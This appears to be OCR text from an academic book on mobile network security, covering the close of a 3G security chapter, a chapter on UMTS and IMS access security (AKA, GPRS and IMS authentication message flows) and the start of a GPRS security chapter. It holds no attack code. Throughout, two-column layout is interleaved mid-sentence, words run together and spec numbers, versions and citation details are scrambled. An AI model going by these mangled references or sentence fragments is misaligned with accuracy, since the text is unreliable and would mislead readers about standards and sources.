scheme is compatible with the legal interception 3rd Generation Partnership Project (3GPP) TS
option and NAT presence. Moreover, since the 22.100 (v3.7.0). (2001). UMTS phase 1 Release
SecSresidesattheGGSN,italsoprovides 9 .firewall
Sophia-Antipolis Cedex, France: Author.
services to the UMTS network applying network Retrieved from ftp://ftp.3gpp.org/specs/2006-12/
security policy. R1999/22_series
conclusIon 23.002 (v3.6.0). (2002). Network architecture.
Sophia-Antipolis Cedex, France: Author. Re-
The evolution of G3 networks signifiestrieved a shiftfrom ftp://ftp.3gpp.org/specs/2006-12/
towards open and easily accessible network ar- R1999/23_series
chitectures, which raise major security concerns. 3rd Generation Partnership Project (3GPP) TS
To address these concerns, a specific24.008 security
(v3.13.0). (2002). Mobile radio interface
architecture named as 3G security architecture signaling layer 3 specification; Core network
has been designed. This chapter has presented protocols—Stage 3. Sophia-Antipolis Cedex,
an analysis of the 3G security architecture. This France: Author. Retrieved from ftp://ftp.3gpp.
architecture comprises a set of mechanisms that org/specs/2006-12/R1999/24_series
attempt to ensure that all information generated
by or relating to a user, as well as the resources 3rd Generation Partnership Project (3GPP) TS
and services provided by the serving network and 25.401 (v3.10.0). (2002). UTRAN overall descrip-
the home environment, are adequately protected tion. Sophia-Antipolis Cedex, France: Author.
against misuse or misappropriation. In addition Retrieved from ftp://ftp.3gpp.org/specs/2006-12/
to these mechanisms, a set of traditional security R1999/25_series
technologiesdesignedforfixedand- wireless net Partnership Project (3GPP) TS
3rd Generation
works can also be applied to protect 3G networks. 31.111 (v3.7.0). (2001). USIM application toolkit
Based on the carried analysis, the critical points in (USAT). Sophia-Antipolis Cedex, France: Author.
the 3G-security architecture, which might cause Retrieved from ftp://ftp.3gpp.org/specs/2006-12/
network and service vulnerability, have been R1999/31_series
outlined. Finally, the current research activities
on the UMTS security that aim at improving the 3rd Generation Partnership Project (3GPP) TS
UMTS security architecture have been briefl
33.102 y
(v3.12.0). (2002). 3G security, security archi-
presented. tecture. Sophia-Antipolis Cedex, France: Author.
Retrieved from ftp://ftp.3gpp.org/specs/2006-12/
R1999/33_series

3rd Generation Partnership Project (3GPP) TS Xenakis, C., Loukas, N., & Merakos, L. (2006,
33.200 (v4.3.0). (2002). G3 security; NetworkApril). A secure mobile VPN scheme for UMTS.
domain security; MAP application layer - secu
In Proceedings ofEuropeanWireless Ath-026,
rity. Sophia-Antipolis Cedex, France: Author. ens, Greece.
Xenakis, C., & Merakos, L. (2004a). IPsec-based
Rel-4/33_series
end-to-end VPN deployment over UMTS. Com-
3rd Generation Partnership Project (3GPP) TS puter Communications, 27(17), 1693-1708.
33.210 (v5.1.0). (2002). G3 security;Network - do
Xenakis, C., & Merakos, L. (2004b). Security in
main security: IP network layer security. Sophia-
Antipolis Cedex, France: Author. Retrieved from
munications, 27(7), 638-650.
ftp://ftp.3gpp.org/specs/2006-12/Rel-5/33_series
Xenakis, C., & Merakos, L. (2006). Alternative
3rd Generation Partnership Project (3GPP) TR
schemes for dynamic secure VPN deployment
33.908 (v3.0.0). (2000). G3 security; General - re
over UMTS. Wireless Personal Communications,
port on the design, specification and evaluation
63 (2), 163-194.
of GPP
3 standards confidentiality and integrity
algorithms. Sophia-Antipolis Cedex, France: Au- Zhang, M., & Fang, Y. (2005). Security analysis
thor. Retrieved from ftp://ftp.3gpp.org/specs/2006- and enhancements of 3GPP authentication and key
12/R1999/33_series agreement protocol. IEEE Transactions on Wireless
35.205 (v3.0.0). (2001). G3 security;Specification
of the MILENAGE set: An example algorithm set
for the 3GPP authentication and key generation kEy tErMs
functions f1, f1, * f2, f3, f4, f5, and f5. * Sophia-
Antipolis Cedex, France: Author. Retrieved from International mobile subscriber identity
ftp://ftp.3gpp.org/specs/2006-12/Rel-4/35_series (IMSI): IMSI is a unique number associated
Gleeson, B., Lin, A., Heinanen, J., Armitage, G., with all UMTS network mobile phone users.
& Malis, A. (2000). A framework for IP based Internet key exchange (IKE): IKE is a
virtual private networks (RFC 2764). Retrieved protocol used to set up a security association
from http://tools.ietf.org/html/rfc2764 (SA) in the IPsec protocol suite.
Gupta, V., & Gupta, S. (2001). Securing the wire- IP security (IPsec): IPsec is a suite of
less Internet. IEEE Communications Magazine, protocols for securing IP communications by
93 (12), 68-74. authenticating and/or encrypting each IP packet
Harkins, D., & Carrel, D. (1998). The Internet in a data stream.
key exchange (IKE) (RFC 2409). Retrieved from Temporary mobile subscriber identity
http://www.ietf.org/rfc/rfc2409.txt (TMSI): TMSI is a randomly allocated num-
Kent, S., & Atkinson, R. (1998). Security architec- ber that is given to the mobile the moment it is
ture for the Internet Protocol (RFC 2401). Retrieved switched on and serves as a temporary identity
from http://www.ietf.org/rfc/rfc2401.txt between the mobile and the network.
Wireless Application Forum (WAP). (n.d.). WAP Third generation (3G): 3G is a technology
specifications. Retrieved from http://www.wapfo- context of mobile phone standards. The
in the
rum.org/what/technical.htm services associated with 3G include wide-area
wireless voice telephony and broadband wire-
less data, all in a mobile environment.

Universal mobile telecommunications Wideband code division multiple access

system (UMTS): UMTS is one of the 3G (WCDMA): WCDMA is a wideband spread-
mobile phone technologies. spectrum mobile air interface that utilizes the
direct sequence code division multiple access
Universal subscriber identity module (CDMA) signaling method to achieve higher
(USIM): USIM is an application for UMTS speeds and support more users compared to the
mobile telephony running on a UICC smart implementation of time division multiplexing
card which is inserted in a 3G mobile phone (TDMA) used by 2G GSM networks.
and stores user subscriber information and
authentication information.
EndnotEs
1
o String concatenation.
2
⊕Exclusive or

Chapter XXI
Access Security in UMTS
and IMS
Yan Zhang
Simula Research Laboratory, Norway
Yifan Chen
University of Greenwich, UK
Rong Yu
South China University of Technology, China
Supeng Leng
University of Electronic Science and Technology of China, China
Huansheng Ning
Beihang University, China
Tao Jiang
Huazhong University of Science and Technology, China
version for the CDMA-95, which is predominantly

IntroductIon
deployed in North America and North Korea. Time
division-sychrononous CDMA (TD-SCDMA) is
Motivated by the requirements for higher data
in the framework of 3rd generation partnership
rate, richer multimedia services, and broader radio
project 2 (3GPP2) and is expected to be one of the
range wireless mobile networks are currently in the
principle wireless technologies employed in China
stage evolving from the second-generation (2G),
in the future (http://www.3gpp.org; 3G TS 35.206).
for example, global system for mobile communica-
It is envisioned that each of three standards in the
tions (GSM), into the era of third-generation (3G)
framework of international mobile telecommunica-
or beyond 3G or fourth-generation (4G). Universal
tions-(IMT-02 will
)02 playasignificantrole
mobile telecommunications system (UMTS) is
in the future due to the backward compatibility,
the natural successor of the current popular GSM
investment, maintenance cost, and even politics.
(http://www.3gpp.org) code division multiple ac-
In all of the potential standards, access security is
cess 2000 (CDMA2000) is the next generation
one of the primary demands as well as challenges
toresolvethedeficiencyexistingin - the second

2005). gen the secure communication in a
To ensure
eration wireless mobile networks such as GSM, in multimedia session, an efficient access securit
which only one-way authentication is performed for mechanism shall be also provided.
the core network part to verify the user equipment In this chapter, we make an introduction to the
(UE) (3G TS 24.008). Such access security may access security in the next generation wireless
lead to the “man-in-middle” problem, which is a mobile networks, including the mechanisms in
type of attack that can take place when two clients the circuited-switched domain, packet-switched
are communicating remotely and exchange public domain, and also the emerging IMS domain.
keys in order to initialize secure communications.
If both of the two public keys are intercepted in
the route by someone, he/she can act as a conduit bAckground ovErvIEw
and send in the messages with his/her own faked
public key. As a result, the secure communication Figure 1 shows the UMTS network architecture
is eavesdropped by a third party. with most related components in security man-
Multimedia service provisioning is one of the agement (3G TS 29.002; 3G TS 33.102). User
primary demands and motivations for the next terminal (UE) utilizes the circuited-switched or
generation wireless networks. To achieve this goal, packet-switched service through the radio interface
the IP multimedia subsystem (IMS) is added as the between base station (BS) and itself. BS locates in
core network in UMTS providing the multimedia the center of a cell which coveres a radio range.
service, for example, voice telephony, video con- BS provides the wireless access point for UEs to
ference, real-time streaming media, interactive the core network. Radio network controller (RNC)
game, voice over IP, picture, HTTP, and instant monitors and supervises the activities of several
messaging (3G TS 33.203). The multimedia session BS under its management. Radio access network
management, initialization, and termination are (RAN) consists of the RNC and the associated
specified and implemented in the
session initia- BS under the RNC. Home location register (HLR)
tion protocol (SIP) (3G TS 29.228; Zhang & Fang, stores the permanent information for the subscrib-
Figure 1. UMTS network architecture
0
Figure 2. UMTS network authentication and key agreement (AKA)
Figure 3. AKA phase 1: Distribution of authentication vector
ers, for example, International Mobile Subscriber AccEss sEcurIty In uMts

Identity (IMSI), subscribed service profile, and
identity of current location area. Authentication Figure 2 shows the most signicant feature in the
center (AuC) is responsible to verify the validness of framework of UMTS security management, that
user’s activity including call behavior and location is, authentication and key agreement (AKA) (3G
management. Normally, HLR and AuC locates in TS 24.008). Authentication refers to the mutual
the same database/server. Serving GPRS support authentication mechanism that the subscriber is
node (SGSN) connects the core network and the able to use to authenticate the network, and the
radio access network and is responsible for location network is also able to authenticate the user. Key
management and for delivering packets between agreement refers to the mechanism to generate the
UE and the core network. Gateway GPRS support cipher key and integrity key. The events for trig-
node (GGSN) acts similar as a gateway between gering the AKA process include location update
core network and the external IP networks such request, user registration, service request, attach
as Internet, telecommunication networks, and request, detach request, and connection re-estab-
enterprise intranets. lishment request.

Figure 4. AKA phase 2: Authentication and key establishment
The authentication protocol is based on a perma- means of the authentication function f1-f5, where
nent secret key K (128-bit) that is shared between for instance the function f1 is employed to compute
the UE and HLR/AuC. The AKA mechanism can XRES, the function f2 is used to compute RES,
be divided into two phases: the distribution of au- and the function f3 is used to compute CK ( 3G
thentication vector (DAV) from the HLR/AuC to the TS 33.105; 3G TS 35.205; 3G TS 35.206). After
SGSN as shown in Figure 3, and the authentication successfully generating n AVs, AuC sends back
and key establishment between the UE and the the AV array to SGSNn via the message authen-
core network as illustrated in Figure 4. tication data response, and SGSNn saves these n
AVs for the particular UE. It is noteworthy that
distribution of Authentication vector this phase executes not only upon UE entering a
new SGSN area, but also when there are no AVs
When a UE leaves an old SGSN (SGSNo) and available upon an action arrival which requires
moves into the coverage of a new SGSN (SGSNn), authentication.
SGSNn has no corresponding record for the UE,
which makes it necessary to authenticate the UE Authentication and key
prior to the subsequent behavior. SGSNn will Establishment
delivery the message authentication data request
(ADR) to the HLR/AuC with the UE’s unique For each activity triggering authentication request
IMSI.BasedonthereceivedIMSI,AuCcanfind such as call origination, paging, or location update
the associated record in its database and hence the the SGSN initiates the challenge user authentica-
according master key K for this particular UE. tion request (UAR) message to the UE with the
Then, HLR/AuC generates the number of n AV parameters RAND and AUTN, which is retrieved
instead of single one AV for the sake of saving from the ith i
( =…n)
,2 1 AV in the first-in-first-
signaling overhead. The AV structure is comprised out (FIFO) manner. Upon receiving the AV, the
offivecomponents:a ) 1 ( randomnumberRAND, UE checks the validity of AUTN. For this goal,
(2) an expected authentication response XRES, (3) the UE retrieves SQN component AUTNfrom
a cipher key CK, (4) an integrity key IK, and (5) and calculates expected message authentication
a network authentication token AUTN ( 3G TS code for authentication (XMAC-A). The UE then
23.060). In each generation, an AV is calculated by compares X-MAC-A and message authentication

code for authentication (MAC-A) component in tion, the subscriber identification, location, u
AUTN, if they are equal to each other, then the data, and signaling data should be encrypted.
networkisverified.Otherwise,theUErejectsthe
UAR and hence the network. After the network
is identified, UE checks the SQN freshness, that sEcurIty In IMs
AccEss
is, the SQN has never been used before. When
the network succeeds, the UE then computes the There are three entities relevant to the IMS security
authentication response RES from the received architecture (see Figure 5). A proxy call session
RAND value and sends it in a user authentication control function (P-CSCF) locates in the serving
response message to the SGSN. If RES equals networkofaUEandactsasthefirstaccesspoint
the expected response XRES, then the UE is in the serving network. P-CSCF is responsible for
successfully authenticated. Since there are n AVs forwarding SIP messages of an UE to the home
generated and recorded in SGSNn during each network. A serving call session control function
operation of DAV while only one AV is used dur- (S-CSCF) locates in the home network to provide
ing an authentication event, the signaling between session control of multimedia services and acts
SGSN and HLR/AuC during DAV is not needed as SIP registrar or SIP proxy server. The S-CSCF
for every authentication event. sends messages toward the home subscriber server
It is believed that, after the AKA procedure, all (HSS) and the AuC to receive subscriber data and
messages are claimed integrity protection, and the authentication information. An interrogating call
signalingdataaswellasuserdata - are confidential
session control function (I-CSCF) locates in the
ity protection. In the sense of integrity protection, home network and acts as a SIP proxy toward the
the content of signaling messages should not be home network. I-CSCF is responsible for selecting
manipulated.Withregardtoconfidentiality - protec
an appropriate S-CSCF for the UE and forwarding
SIP requests/responses toward the S-CSCF.
Figure5.IMSnetworkarchitecture

Different from the one-pass authentication pro- subscriberprofiletoS-CSCF.Wewilldiscussthe

cedure in AKA illustrated in Figure 2, the security GPRS authentication and IMS authentication in
in IMS is a two-pass authentication procedure, the following two subsections. The discussion of
including general packet radio servcie (GPRS) either GPRS registration or PDP context activation
authentication and IMS authentication (3G TS is out of the scope and the readers are suggested
29.229). Before utilizing the IMS service, a UE torefertotherelatedtechnicalspecification
shouldfirstsetupadataconnectionto TS know
33.102).theIP
address of P-CSCF and to carry the SIP signaling
messages through the P-CSCF. The data connec-
tion establishment is comprised of two steps, that gPrs AutHEntIcAtIon
is, attach and packet data protocol (PDP) context
activation.Thefirstphaseattachisused GPRSto establish
authentication is performed in the framework
mobility management context between the UE and of GPRS mobility management (GMM) (http://
SGSN. During this procedure, the UE should per- www.3gpp2.org; 3G TS 33.102). Figure 6 shows
form GPRS authentication and GPRS registration the messages sequence in GPRS authentication.
to verify its validness and retrieve the subscriber In particular, the steps include:
profile including subscribed services,
quality of
serviceQoS) ( profile,IPaddress,andsoon.Once 1. The UE sends GMM Attach Request
the UE is attached, the second step PDP context (IMSI) to the SGSN with the unique identity
activation is followed to activate a PDP address and IMSI.
build the association between the SGSN and GGSN. 2. If the SGSN has at least one AV for the UE,
Only after attached and PDP context activation, an then step 2 and 3 are skipped. Otherwise,
UE can access IMS services through registration the SGSN has to obtain AVs from the entity
process. The registration is necessary to inform HSS/AuC. SGSN triggers the procedure DAV
the HSS the location, authenticate and download by sending a MAP-SEND-AUTHENTICA-
Figure6.GPRSauthentication

TION-INFO Request (IMSI) message to the in Figure 7 (CWTS TSM 03.20; 3G TS 29.229).
HLR/AuC with the parameter IMSI uniquely This procedure includes the IMS authentication
identifying the UE. and the IMS registration. In particular, the steps
3. Upon receiving the authentication request, include:
the HSS/AuC searches the according record
in the database on the basis of IMSI. Then, 1. To start registration, the UE sends a SIP
HSS/AuC generates an ordered array of n REGISTER (IMPI, IMPU) message to
AVs for the specific UE. Each AV consists the P-CSCF in the serving network. On the
of the following components: a random num- receipt, the P-CSCF forwards the registration
ber RAND, an expected response XRES, a request to the I-CSCF of the home network.
cipher key CK, an integrity key IK, and an I-CSCF then delivers the message to a chosen
authentication token AUTN. The HSS/AuC S-CSCF.
then sends back the message MAP-SEND- 2. If the S-CSCF has at least one AV for the UE,
AUTHENTICATION-INFO Response to then steps 2 and 3 are skipped. Otherwise,
SGSN with the AV array as parameters. the S-CSCF has to obtain AVs from the entity
4. SGSN stores these n AVs for the particular HSS/AuC. S-CSCF triggers the procedure
UE and shall choose the next unused AV DAV by sending a Cx-AV-Req(IMPI, n)
in the ordered AV array. Subsequently, the message to the HSS/AuC with the parameter
SGSN shall challenge the UE and sends mes- IMPI uniquely identifying the UE and the
sage GMM Authentication and Ciphering number of n AVs wanted.
Request with parameters RAND and AUTN 3. Upon receipt of a request from the S-CSCF,
populated from the selected AV. the HSS/AuC searches the database on the
5. The UE checks the validness of the received basis of the unique IMPI, obtains the sub-
AUTN. In case it is acceptable, the UE shall scriber profile, and generates an ordered
calculate a response RES and send back array of nAVsforthespecificUE.EachAV
to the SGSN through the message GMM consists of the following components: a ran-
Authentication and Ciphering Response. dom number RAND, an expected response
The SGSN retrieves the expected response XRES, a cipher key CK, an integrity key
XRES from the selected AV and compares IK, and an authentication token AUTN. Each
XRES with the received response RES. If AV is good for only one authentication and
they match, the authentication and key agree- key agreement between the IMS subscriber
ment is successfully completed and the keys and the S-CSCF. The HSS/AuC then sends
CK and IK are retrieved for the following back the message Cx-AV-Req-Resp(IMPI,
signalingconfidentialityandintegrity - protec
RAND1||AUTN1||XRES1||CK1||IK1,…,
tion. RANDn||AUTNn||XRESn||CKn||IKn) to
6. The SGSN sends a GMM Attach Accept the S-CSCF with the array of AV as param-
message to the UE to indicate the completion eters.
of the successful attach procedure. .4 TheS-CSCFchoosesthefirstunusedAVin
the array of AVs based on FIFO policy. From
the selected AV, the items RAND, AUTN,
IMs AutHEntIcAtIon IK, and CK are populated. The S-CSCF
sends the message SIP 4xx-Auth-Challenge
After the procedures of GPRS authentication, (IMPI, RAND, AUTN, IK, CK) to the I-
GPRS registration and PDP context activation, the CSCF, which then forwards the message to
UE has the IP address of the P-CSCF and is able P-CSCF. Upon the receipt, the P-CSCF shall
to access the IMS services through the registration store the two keys IK and CK and remove
procedure using SIP and Cx commands as shown thekeyinformationandfinallyforwardthe

Figure 7. IMS authentication
rest of the message SIP 4xx-Auth-Challenge subscriber profile to the S-CSCF. HSS
(IMPI, RAND, AUTN) to the UE. shall send a Cx-Pull Response to the
.5 TheUEverifiesthefreshnessofthereceived S-CSCF with the indicated information.
AUTN and calculates a response RES. This 8. The S-CSCF sends SIP 200 OK mes-
result RES is sent back from the UE to the P- sage to the UE through the I-CSCF and
CSCF through the message SIP REGISTER P-CSCF. After this step, a security as-
(IMPI, RES). After receiving the request, sociate (SA) is active for the protection
the P-CSCF forwards it to the I-CSCF, which of subsequent SIP messages between the
further forwards the authentication response UE and the P-CSCF.
to the S-CSCF. The S-CSCF retrieves the
expected response XRES and compares
XRES and the received response RES. If they futurE trEnds
match, the authentication and key agreement
is successfully completed. Next three steps security Management in
perform registration. Heterogeneous network
6. The S-CSCF sends a Cx-Put message to
the HSS/AuC with the UE identity. The The next generation wireless mobile networks
HSS shall store the S-CSCF name, which are characterized as the co-existent of the variety
is presently serving the UE, and then sends of network architectures, protocols, and applica-
the Cx-Put Response for acknowledge- tions due to the diverse requirements for data rate,
ment. radio coverage, deployment cost, and multimedia
7. Next, the S-CSCF sends a Cx-Pull to the service. The 3GPP is actively specifying the roam-
HSS/AuC with the UE identity in order to ing mechanism in the integrated wireless LAN
download the related information in the (WLAN)/UMTS networks. It should be noted

thatthisscenarioisonlyaspecificheterogeneous thesecurityandQoS.Theauthorsintroducedthe
network. The IEEE 802.16 standard is an emerging system model based on the widely used challenge/
broadband wireless access system specified for
response mechanism. Then, a concept of security
wireless metropolitan area networks (WMAN) level is introduced to describe the different level
with the aim to bridge the last mile, replacing of communication protection with regard to the
costly wireline and also providing high speed nature of security, that is, information secrecy, data
multimedia services in fast moving transportation. integrity,andresourceavailability.Bytakingtra
The recently amended 802.16e adds a mobility and mobility patterns into account, the technique
componentforWMANanddefinesbothphysical establishes a quantitative connection between the
and MAC layers for combined fixed and mobile securityandQoSthroughtheauthenticationan
operations in licensed bands. It is envisaged that the facilitates the evaluation of overall system perfor-
futuregenerationwirelessnetworks isthe
mance underexible
fl diverse security levels, mobility and
and seamless integration of the three technologies trafficprocesses.
WLAN, WMAN, and wireless wide area network Generally, a UE is powered by battery and
(WWAN), where WLAN (e.g., IEEE 802.11 Wi-Fi) hence the mechanism in efficiently utilizing the
serves as the hot-spot access area for short-range limited energy is becoming very important. In
and very high speed; WMAN (e.g., IEEE 802.16 case of more frequent authentication to increase
WiMAX) serves as the metropolitan-wide access the security, the UE will consume more energy.
network with high data rate and WWAN (e.g., With fewer authentications incurring potential
UMTS) provides the national-wide network with vulnerability, the UE is able to enlarge its life-
relatively low data rate. The substantial technical time before re-charging. As a consequence, there
challenge is to design and implement the security is a trade-off between the security and energy
architectures and protocols across such heteroge- management. Potlapally, Ravi, Raghunathan,
neous networks taking into account the seamless and Jha (2003) provided energy consumption
mobility,scalability,andperformanceempirical efficiency. measurements for a variety of ciphers,
hash functions, and signature algorithms. Based
security-Mobility Management on the observations, the study presented some
Interaction and security-Energy reasoning about the energy-security trade-offs in
tradeoff determining key length. However, no analytical
models have been proposed to evaluate the energy-
The performance of security management has a security trade-offs or make the intelligent decision
close interaction with the framework of mobility on trade-off.
management. Mobility management includes two
components: location management and handoff Higher security Protocols
management (http:www.3gpp2.org). There are two
operations in the location management: updating Although AKA has been standardized, the proto-
the UE location and paging the UE. In UMTS, colhastwosignificantweaknesses:HLR/ ) 1 ( AuC
SGSN shall authenticate a UE when the SGSN does not verify whether the information sent from
receives an “Initial L3 message” sent from UE. the visiting location register (VLR)/SGSN is valid
This message is triggered by the actions, includ- or not. That is, AKA has assumed that the link
ing location update request, connection manage- between VLR/SGSN and HLR/AuC is adequately
ment request, routing area update request, attach reliable; and (2) for the UMTS integrity protection
request, and paging response. It is clear that all mechanism, integrity key is transmitted without
these events are closely relevant to the user’s mo- encryption and the user data are not protected.
bility management architecture and mechanism. New strategies shall be designed to address these
Liang and Wang (2005) constructed an analytical issues.
model to evaluate the impact of authentication on

HarnandHsinidentified
) 30 2 ( anddiscussed before all AVs are used up. Comparing with the
the inefficiency and complexity in keeping original
and GPP 3 Technical Specification TS320 1 . 3
managing the sequence number during the network (2000), the proposed strategy is able to achieve
authentication. Based on the combination of hash very low probability in waiting for an available
chaining and keyed-hash message authentication AV with negligible increased signaling overhead
code techniques, an enhanced scheme is proposed and low storage cost. The study in Al-Saraireh
to simplify the protocol implementation and si- and Yousef (2006) also analyzes the transmission
multaneously provide strong periodically mutual overhead during the procedure of AKA. It is pro-
authentication. posed that security protocols performance should
Zhang and Fang (2005) showed that the 3GPP be evaluated from the security perspective and
AKA protocol is vulnerable to a variant of the fake also from the signaling overhead point of view.
BS attack. The vulnerability allows an adversary New security protocols should consider to combat
toredirectusertrafficfromonenetwork toanother
potential vulnerability as well as to introduce low
and to re-use corrupted AVs from one network additional signaling cost.
to all other networks. To address such security
problems in the current 3GPP AKA, the authors
presented a new authentication and key agreement conclusIon
protocol AP-AKA which defeats redirection at-
tack and drastically lowers the impact of network This chapter gives an overview on the security man-
corruption. agement in the next generation wireless networks.
The AKA process is described and its extension
security Protocols Performance in GPRS authentication and IMS authentication
are further discussed in detail. The identifie
Security architecture and protocol are normally research challenges shall serve as the guidance
evaluatedtoguaranteethesecurity, confidentiality,
for the further study to propose more efficient
and integrity requirement. Recently, a few studies security protocols taking into account the network
have appeared to investigate the authentication architecture heterogeneity, the energy-security
signaling traffic performance due to the rapidly
trade-offs, the mobility-security interaction, and
increasing number of subscribers and consequently comprehensive performance evaluation.
potentially high authentication requests and heavy
burden on the signaling networks. Lin and Chen
(2003) argue the disadvantages in fetching the rEfErEncEs
constant number of AV from HLR/AuC. Based
on the observations of the mobility pattern, the 3rd Generation Partnership Project (3GPP) (1999).
authors proposed an adaptive scheme to generate Technical specification core network; Mobile
an optimal number of AV array, which is able to application part MAP) ( specification
. Technical
significantly reduce the authentication signaling
Specification G3 TS 0.2 9 V30. 7 . ) 20(1 -
trafficandhencesavethelimitedbandwidth - utiliza
Sophia Antipolis Cedex, France: Author.
tion. Zhang and Fujise (2006) argue the long delay
problem and proposed a mechanism to address the 3rd Generation Partnership Project (3GPP). Techni-
issue. In particular, when the two entities SGSN calSpecificationGroupCoreNetwork; - MobileRa
and HLR/AuC locate far away from each other, the dio Interface Layer Specification;
3 Core Network
response for an available AV may be potentially ProtocolsStagefor 3 Release02,.9 1 3G TS
very long. The consequence of long delay includes 24.008 version 3.6.0 (2000-12). Sophia Antipolis
call blocking and location update failure, and hence Cedex, France: Author.
degradedQoS.Toaddressthisproblem,the study Partnership Project (3GPP). Tech-
3rd Generation
proposed an enhanced scheme to fetch AV earlier nical Specification Group Services and Systems

Aspects;G3 Security;SecurityArchitecture, 02, 3G security; Access security for IP-based

aspects;
TechnicalSpecificationG3 TSV302 (- 1 .3 0 7 . services, Tech. Spec. 3G TS 33.203 V5.5.0 (2003-
12). Sophia Antipolis Cedex, France: Author. 03).
3rd Generation Partnership Project (3GPP). Tech- 3rd Generation Partnership Project (3GPP). (2003).
nical Specification Group Services and Systems specificationgroupservicesandsystems
Technical
Aspects; General Packet Radio Service GPRS)
( ; IP Multimedia subsystem stage 2, Tech.
aspects;
Service Description; Stage 2, 02, Technical Spec. 3G TS 23.228 version 6.2.0 (2003-06).
SpecificationG3 TSversion
06 . 3 2 . ) 1 - 0 2 ( 0 6. 3
Al-Saraireh, J., & Yousef, S. (2006). Authentication
Sophia Antipolis Cedex, France: Author.
transmission overhead between entities in mobile
3G TS 33.105, 3G Security; Cryptographic Algo- networks. International Journal of Computer Sci-
rithm Requirements. enceandNetworkSecurity, 6
(3B), 150-154.
3G TS 35.205, 3G Security; Specification of the Harn, L., & Hsin, W. (2003). On the security of
MILENAGE Algorithm Set: An Example Algorithm wireless networks access with enhancements. In
Set for the 3GPP Authentication and Key Gen- Proceedings of Web Information Systems Engi-
eration Functions f1, f1, * f2, f3, f4, f5, and f5; * neering (WiSE’03) (pp. 88-95).
Document 1: General.
Liang, W., & Wang, W. (2005). A quantitative study
3G TS 35.206, G3 Security; Specification of the ofauthenticationandQoSinwirelessIPnetworks
MILENAGE Algorithm Set: An Example Algorithm In ProceedingsofIEEEINFOCOM’05 , 2005.
Set for the 3GPP Authentication and Key Gen-
Lin, Y., & Chen, Y. (2003). Reducing authentica-
eration Functions f1, f1, * f2, f3, f4, f5, and f5; *
tion signaling traffic in third-generation mobil
Document:Algorithm
2 Specification.
network. IEEE Transactions on Wireless Com-
China Wireless Telecommunication Standard; munication, 2(3), 493-501.
G3 digital cellular telecommunications system;
Potlapally, N. R., Ravi, S., Raghunathan, A., & Jha,
Security related network functions (Release 3);
N. K. (2003). Analyzing the energy consumption of
CWTS TSM 03.20 V3.0.0 (2002-08).
security protocols. In Proceedings of the interna-
3rd Generation Partnership Project (3GPP). (2003). tional symposium on Low power electronics and
Technicalspecificationcorenetwork;design Cxand(pp.Dx 30-35). ACM Press.
interfaces based on the diameter - protocol; Pro
Rosenberg, J., Schulzrinne, H., Camarillo, G., John-
tocol details, Tech. Spec. 3G TS 29.229 V5.3.0
ston, A., Peterson, J., Sparks, R., et al. (2002). SIP:
(2003-03).
Session initiation protocol (RFC 3261). Retrieved
3rd Generation Partnership Project (3GPP). (2003). from http://www.ietf.org/rfc/rfc3261.txt
Technicalspecificationcorenetwork; - IPmultime
Zhang, M., & Fang, Y. (2005). Security analysis
dia subsystem Cx and Dx interfaces; Signaling
and enhancements of 3GPP authentication and
flows and message contents (Release Tech. , ) 5
key agreement protocol. IEEE Transactions on
Spec. 3G TS 29.228 V5.4.0 (2003-06).
Wireless Communication, 4(2), 734-742.
3rd Generation Partnership Project (3GPP). (2003).
Zhang, Y., & Fujise, M. (2006). An Improvement
Technicalspecificationgroupcore-network;Sig
for Authentication Protocol in Third-Generation
naling flows for the IP multimedia call control
Wireless Networks. IEEE Transactions on Wireless
based on SIP and SDP; Stage ,3 version 0.5
Communications. (9), 52348-2352.
.3GPP
3 0- 2 ) ( 6 TS 24.228.
3rd Generation Partnership Project (3GPP). (2003).
Technicalspecificationgroupservicesandsystems

kEy tErMs IP multimedia subsystem (IMS): IMS is the

component to support multimedia services in 3G
Access security: Access security is the mecha- system.
nism that provides mobile users with secure access
Third generation (3G): 3G wireless com-
to wireless services and protects against attacks
munication systems is standardized to support
on the radio access interface.
multimedia services with high data rate.
General Packet Radio Service (GPRS): GPRS
Universal mobile telecommunications system
is regarded as 2.5 generation mobile system. It
(UMTS): UMTS is one of the third-generation
provides mobile data service to GSM users.
wireless communication systems.
0

Chapter XXII
Christos Xenakis
AbstrAct
The global system for mobile communications (GSM) is the most popular standard that implements sec-
ond generation (2G) cellular systems. 2G systems combined with general packet radio services (GPRS)
areoftendescribedas2.5G,thatis,atechnologybetweenthe2Gandthirdgeneration(3G)ofmob
systems. GPRS is a service that provides packet radio access for GSM users. This chapter presents the
securityarchitectureemployedin2.5GmobilesystemsfocusingonGPRS.Morespecifically,these
measures applied to protect the mobile users, the radio access network, the fixed part
and the related data of GPRS are presented and analyzed in detail. This analysis reveals the security
weaknesses of the applied measures that may lead to the realization of security attacks by adversaries.
These attacks threaten network operation and data transfer through it, compromising end users and
networksecurity.Todefeattheidentifiedrisks,currentresearchactivitiesontheG
a set of security improvements to the existing GPRS security architecture.
IntroductIon tems, consists of an overlay network onto the GSM

network. In the wireless part, the GPRS technology
The global system for mobile communications, reserves radio resources only when there is data
(GSM) is the most popular standard that imple- to be sent, thus, ensuring the optimized utilization
ments second generation (2G) cellular systems. ofradioresources.Thefixedpartofthenetwork
2G systems combined with general packet radio employs the IP technology and is connected to
services (GPRS) (3GPP TS 03.6, 2002) are often the public Internet. Taking advantage of these
described as 2.5G, that is, a technology between features, GPRS enables the provision of a variety
the 2G and third generation (3G) of mobile systems. of packet-oriented multimedia applications and
GPRS is a service that provides packet radio access services to mobile users, realizing the concept of
for GSM users. The GPRS network architecture, the mobile Internet.
which constitutes a migration step toward 3G sys-
For the successful implementation of the new describesbrieflytheGPRSnetworkarchitecture.

emerging applications and services over GPRS, The third section presents the security architecture
security is considered as a vital factor. This is be- applied to GPRS and the fourth section analyzes its
cause of the fact that wireless access is inherently securityweaknesses.Thefifthsectionelaborates
less secure and the radio transmission is by nature the current research activities on the GPRS security
more susceptible to eavesdropping and fraud in and the sixth section presents the conclusions.
use than wire-line transmission. In addition, users’
mobility and the universal access to the network
imply higher security risks compared to those gPrs nEtwork ArcHItEcturE
encountered in fixed networks. In order to meet
securityobjectives,GPRSusesaspecific security
The network architecture of GPRS (3GPP TS 03.6,
architecture, which aims at protecting the network 2002) is presented in Figure 1. A GPRS user owns
against unauthorized access and the privacy of a mobile station (MS) that provides access to the
users. This architecture is mainly based on the wireless network. From the network side, the base
security measures applied in GSM, since the GPRS station subsystem (BSS) is a network part that is
system is built on the GSM infrastructure. responsible for the control of the radio path. BSS
Based on the aforementioned consideration, consists of two types of nodes: the base station
the majority of the existing literature on security controller (BSC) and the base transceiver station
in 2.5G systems refers to GSM (Mitchell, 2001; (BTS). BTS is responsible for the radio coverage
